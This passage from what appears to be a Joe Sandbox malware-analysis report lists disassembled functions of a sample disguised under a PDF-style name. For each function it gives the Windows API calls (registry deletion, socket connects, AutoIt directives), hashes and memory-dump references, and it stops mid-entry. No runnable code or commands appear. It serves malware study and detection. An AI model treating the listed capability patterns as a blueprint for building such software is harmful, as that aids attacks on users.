                                                                                                                      • Opcode Fuzzy Hash: a2bd5080baa42566bd7ba328d0e4aadc716f1187c9df78cd984929c7546a6250
                                                                                                                      • Instruction Fuzzy Hash: E1411775A05609EFDB14DF54E884E9ABBB8FF04314F08812AE95697350E735ED50CF90
                                                                                                                      Function 007D122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007D125C
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D1286
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 007D133D
                                                                                                                        • Part of subcall function 007D122D: RegCloseKey.ADVAPI32(?), ref: 007D12A3
                                                                                                                        • Part of subcall function 007D122D: FreeLibrary.KERNEL32(?), ref: 007D12F5
                                                                                                                        • Part of subcall function 007D122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007D1318
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 007D12E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 395352322-0
                                                                                                                      • Opcode ID: 724335ff7666e7808b63998b12cc5bf79a8f503c758d656e0bd69c265fabe591
                                                                                                                      • Instruction ID: 4e0a5b580da4b05b18a9d662243224a8730d4be62428b739d887aeadc9124b90
                                                                                                                      • Opcode Fuzzy Hash: 724335ff7666e7808b63998b12cc5bf79a8f503c758d656e0bd69c265fabe591
                                                                                                                      • Instruction Fuzzy Hash: 82312BB1901109BFDB149B90DC89EFEB7BCEF08300F40416AE512E2251EA79AE459BA4
                                                                                                                      Function 007D653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007D655B
                                                                                                                      • GetWindowLongW.USER32(019059A0,000000F0), ref: 007D658E
                                                                                                                      • GetWindowLongW.USER32(019059A0,000000F0), ref: 007D65C3
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007D65F5
                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007D661F
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 007D6630
                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007D664A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2178440468-0
                                                                                                                      • Opcode ID: b99d46e805df2518f2aec61d19e76d373d2a2da36f35e9e61710c361a99f6297
                                                                                                                      • Instruction ID: caedf365965d6ef8cd78448c29b3946fd62065d467eac9ec6ee1873c1fa77958
                                                                                                                      • Opcode Fuzzy Hash: b99d46e805df2518f2aec61d19e76d373d2a2da36f35e9e61710c361a99f6297
                                                                                                                      • Instruction Fuzzy Hash: 7B310230605210AFDB20CF18EC84F553BF5FB4A310F1881AAF5568B3B6CB69E8A0DB51
                                                                                                                      Function 007C6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007C64D9
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 007C64E8
                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C6521
                                                                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 007C652A
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 007C6534
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 007C655D
                                                                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C6576
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 910771015-0
                                                                                                                      • Opcode ID: e639dfc8ecc55e133bf2ca4450890b443ad43003834908eea3c4e63d07634a85
                                                                                                                      • Instruction ID: 1e38b10d83f8ef84bb4ec43001d7a63ac75b43c21afc80cca6e28f6b9e8d7376
                                                                                                                      • Opcode Fuzzy Hash: e639dfc8ecc55e133bf2ca4450890b443ad43003834908eea3c4e63d07634a85
                                                                                                                      • Instruction Fuzzy Hash: 2D31A431600118EBDB109F24DC89FBE77B9EB44721F04802DFD06A7291DB78AD04CB62
                                                                                                                      Function 007AE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007AE0FA
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007AE120
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 007AE123
                                                                                                                      • SysAllocString.OLEAUT32 ref: 007AE144
                                                                                                                      • SysFreeString.OLEAUT32 ref: 007AE14D
                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 007AE167
                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 007AE175
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3761583154-0
                                                                                                                      • Opcode ID: d4784a8398aaae753f0b9be023a7cd4ac8272bf2b3f3013bd613e39fa0ab8ade
                                                                                                                      • Instruction ID: 492d5e8b05a9b60799595e561beead48ccc0f6baae7fb4b21a2b612753f8a352
                                                                                                                      • Opcode Fuzzy Hash: d4784a8398aaae753f0b9be023a7cd4ac8272bf2b3f3013bd613e39fa0ab8ade
                                                                                                                      • Instruction Fuzzy Hash: FA215335605118AFDB10AFA8DC88DAB77ECEB4A760B50C236F955CB260DA78DC41CF64
                                                                                                                      Function 007AFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                      • Opcode ID: c750369eccc7adcec5d0f129311e1d459d24da501b68bc0d783ab9116b9519d1
                                                                                                                      • Instruction ID: e11f40d85954d8fa646d76c1048b93704782e0b90c95a94cb9db8e87f1f4bc34
                                                                                                                      • Opcode Fuzzy Hash: c750369eccc7adcec5d0f129311e1d459d24da501b68bc0d783ab9116b9519d1
                                                                                                                      • Instruction Fuzzy Hash: C4219A72200650A6D634A675DC16FA7739CDF96350F108235F88986182EB5C9D82D2B4
                                                                                                                      Function 007D783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                                                                                                                        • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                                                                                                                        • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007D78A1
                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007D78AE
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007D78B9
                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007D78C8
                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007D78D4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                      • Opcode ID: fb59fa6dc369597c83dbf1479c07128739a5c871ea04d9b091977dcd036f6ce5
                                                                                                                      • Instruction ID: fd6bc40a31d845ede7355fc6835399d7afa5101ea3387e5f8ad3a58894250847
                                                                                                                      • Opcode Fuzzy Hash: fb59fa6dc369597c83dbf1479c07128739a5c871ea04d9b091977dcd036f6ce5
                                                                                                                      • Instruction Fuzzy Hash: 5211B2B2110219BFEF159F60CC85EE77F6DEF08798F018115FA04A2190DB769C21EBA4
                                                                                                                      Function 007741C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00774292,?), ref: 007741E3
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 007741EA
                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 007741F6
                                                                                                                      • DecodePointer.KERNEL32(00000001,00774292,?), ref: 00774213
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                      • String ID: RoInitialize$combase.dll
                                                                                                                      • API String ID: 3489934621-340411864
                                                                                                                      • Opcode ID: 1e2352989cd764ac352148f7e687b2ac7524404b2bcdf2354fd31ebb75affd28
                                                                                                                      • Instruction ID: f2aff5a5587cf137f6f821de3767f326d4210f9ce0e7dfb2411e42ce0347d581
                                                                                                                      • Opcode Fuzzy Hash: 1e2352989cd764ac352148f7e687b2ac7524404b2bcdf2354fd31ebb75affd28
                                                                                                                      • Instruction Fuzzy Hash: 89E01AB0692344BEEF206BB1EC0DB543AA8BB24742F51D425F916D50A0DBBE40928F04
                                                                                                                      Function 0077429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007741B8), ref: 007742B8
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 007742BF
                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 007742CA
                                                                                                                      • DecodePointer.KERNEL32(007741B8), ref: 007742E5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                      • API String ID: 3489934621-2819208100
                                                                                                                      • Opcode ID: 4d84bc07b4c6f33343503519e624323da84c78b8a9af7b47a7650800c53a2d8b
                                                                                                                      • Instruction ID: 06ce0cebd6c8be52bcbd664678aa6ab291010f3b797652cdaa1f2de6edacdc2c
                                                                                                                      • Opcode Fuzzy Hash: 4d84bc07b4c6f33343503519e624323da84c78b8a9af7b47a7650800c53a2d8b
                                                                                                                      • Instruction Fuzzy Hash: 8AE0B6B8682305BBEB119B61ED0DF843BB8BB24782F15D026F112E10A5CBBD4561CA18
                                                                                                                      Function 007B675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253778849-0
                                                                                                                      • Opcode ID: 80b5b34108944b4165bc1cf5c6d501e0a968af88b2aa23ea6038a87017b1d6f0
                                                                                                                      • Instruction ID: 6c2b998bbf63f20502357cda86acc6054873ac67d7f32004635076aeeec6d845
                                                                                                                      • Opcode Fuzzy Hash: 80b5b34108944b4165bc1cf5c6d501e0a968af88b2aa23ea6038a87017b1d6f0
                                                                                                                      • Instruction Fuzzy Hash: 69619B3050069ADBDF11EF24C88AFFE37A8AF44308F444559FE5A5B292DB7CA945CB90
                                                                                                                      Function 007D046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0548
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D0588
                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007D05AB
                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007D05D4
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007D0617
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 007D0624
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4046560759-0
                                                                                                                      • Opcode ID: 8a1764192edd54b3c2c7ae451d26f11d0310ed89bf964bd58a83b0d92b08ee13
                                                                                                                      • Instruction ID: 1a805e111a9bf99d30e3797cb12f51f5f2ba27603b56899138ee7ec616dadaf3
                                                                                                                      • Opcode Fuzzy Hash: 8a1764192edd54b3c2c7ae451d26f11d0310ed89bf964bd58a83b0d92b08ee13
                                                                                                                      • Instruction Fuzzy Hash: FE514D31508240DFC714EF24D889E6ABBF8FF85314F04891EF946972A1DB79E915CB92
                                                                                                                      Function 007D5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMenu.USER32(?), ref: 007D5A82
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 007D5AB9
                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007D5AE1
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 007D5B50
                                                                                                                      • GetSubMenu.USER32(?,?), ref: 007D5B5E
                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 007D5BAF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 650687236-0
                                                                                                                      • Opcode ID: f8cda55c61c165bc7c64788d9eebbc2e804b9f31f2d962fe1dd4fd7cc0ecf34f
                                                                                                                      • Instruction ID: 5488ba54c48ddb8239a91e8a415689d621a3f53410f29ce094f349524c0f0b42
                                                                                                                      • Opcode Fuzzy Hash: f8cda55c61c165bc7c64788d9eebbc2e804b9f31f2d962fe1dd4fd7cc0ecf34f
                                                                                                                      • Instruction Fuzzy Hash: 30517F75A00615EFCF11DF64C845AEEBBB4EF48310F14846AE956B7351CB78AE41CB90
                                                                                                                      Function 007AF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 007AF3F7
                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 007AF469
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 007AF4C4
                                                                                                                      • _memmove.LIBCMT ref: 007AF4EE
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007AF53B
                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007AF569
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1101466143-0
                                                                                                                      • Opcode ID: 42191b8e5d10618f6b131f08b393182c79b0734e99406a42cc157ed160478538
                                                                                                                      • Instruction ID: 3ca79c27bb5ded022b6ae050a4bdddd41ae45192a54bba18ade0e70bb877b41c
                                                                                                                      • Opcode Fuzzy Hash: 42191b8e5d10618f6b131f08b393182c79b0734e99406a42cc157ed160478538
                                                                                                                      • Instruction Fuzzy Hash: B4516D75A00249DFCB14CF58D884AAAB7B8FF8D354B158669ED59DB300D734E911CFA0
                                                                                                                      Function 007B26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007B2747
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2792
                                                                                                                      • IsMenu.USER32(00000000), ref: 007B27B2
                                                                                                                      • CreatePopupMenu.USER32 ref: 007B27E6
                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 007B2844
                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007B2875
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3311875123-0
                                                                                                                      • Opcode ID: 1195c19135a554585206656a0b4aea5450f68583379d236a2d65b54cd05542b2
                                                                                                                      • Instruction ID: 87fac09c8b8d9708c6235a664f165409314cf33e4b39bc094aed460099eb9fca
                                                                                                                      • Opcode Fuzzy Hash: 1195c19135a554585206656a0b4aea5450f68583379d236a2d65b54cd05542b2
                                                                                                                      • Instruction Fuzzy Hash: 7F51C170A02309DFDF25CF68D888BEEBBF5AF44314F104229E4159B292D7789906CB61
                                                                                                                      Function 00751765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
